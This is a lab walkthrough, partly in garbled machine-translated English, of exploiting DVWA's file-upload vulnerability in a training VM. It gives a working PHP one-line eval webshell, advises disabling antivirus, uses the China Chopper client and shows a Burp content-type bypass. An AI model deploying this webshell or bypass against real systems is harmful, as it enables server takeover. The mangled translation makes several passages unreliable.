1. Experimental environment
Target drones: OWASP_Broken_Web_Apps_VM_1.2
Download
we need 中国菜刀and kalithese two tools, all the anti-virus software off, or Chinese chopper may be harmonious antivirus software.
Principle
1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等
2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入后台存储,需要的时候再调用出来返回
3、如果恶意文件如PHP、ASP等执行文件绕过Web应用,并顺利执行,则相当于黑客直接拿到了Webshell
4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网
5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击Web服务,实际渗透两种相结合,达到对目标的深度控制
2. Low Safe Mode
First we need to open the target drone with a virtual machine and view ip address
root@owaspbwa:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN qlen 1000
link/ether 00:0c:29:b2:da:ea brd ff:ff:ff:ff:ff:ff
inet 192.168.13.144/24 brd 192.168.13.255 scope global eth0
inet6 fe80::20c:29ff:feb2:daea/64 scope link
valid_lft forever preferred_lft forever
After finding ip, we open the page visit 192.168.13.144
upload the file we have written pony (horse)
file which there is only a single line, so called Pony
Pony: Pony, also known as Trojans word that the entire shell code the amount of only one line, the system typically performs functions
Malaysia: code amount and functionality than the pony, secondary generally in encrypted form, the security firewall to prevent / detect intrusion system
<?php @eval($_POST['yjssjm']);?>
格式不要动,只需要改''里面的东西就行了,yjssjm是你定义的密码,与下面使用的中国菜刀密码保持一致就行
Then we went above the target drone to view and create a test file
root@owaspbwa:~# cd /owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
shell.php
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# echo 'aaaa' > a.txt #创建一个测试文件
root@owaspbwa:/owaspbwa/owaspbwa-svn/var/www/dvwa/hackable/uploads# ls
a.txt shell.php
After setting we double-click to open point
we will a.txt delete, and then to see on the server and found a.txt file on the server has been deleted, it is the use of the upload vulnerability to attack.
3. Safe Mode
We changed to medium security, then upload this time we find that we failed to upload
this time we need to use this tool as a proxy kali, visit our message interception, then the type of change then forward past it.
Open kali, the default user name is root, password is toor
then we have been the bottom right corner point I Accept ---- next ------ Start Burp entered on the line
and then we need to set up a web page, all access will turn to 192.168.13.145
and then we upload again, this time kali will be displayed above the information we uploaded
look DVWA we found success
next just as above, we can attack the server on the Chinese kitchen knife.
If you have downloaded a bad Chinese kitchen knife with a small partner kali can leave their e-mail in the comments section,
where we all try to persuade enough on their computers, if caused economic losses on the bad.
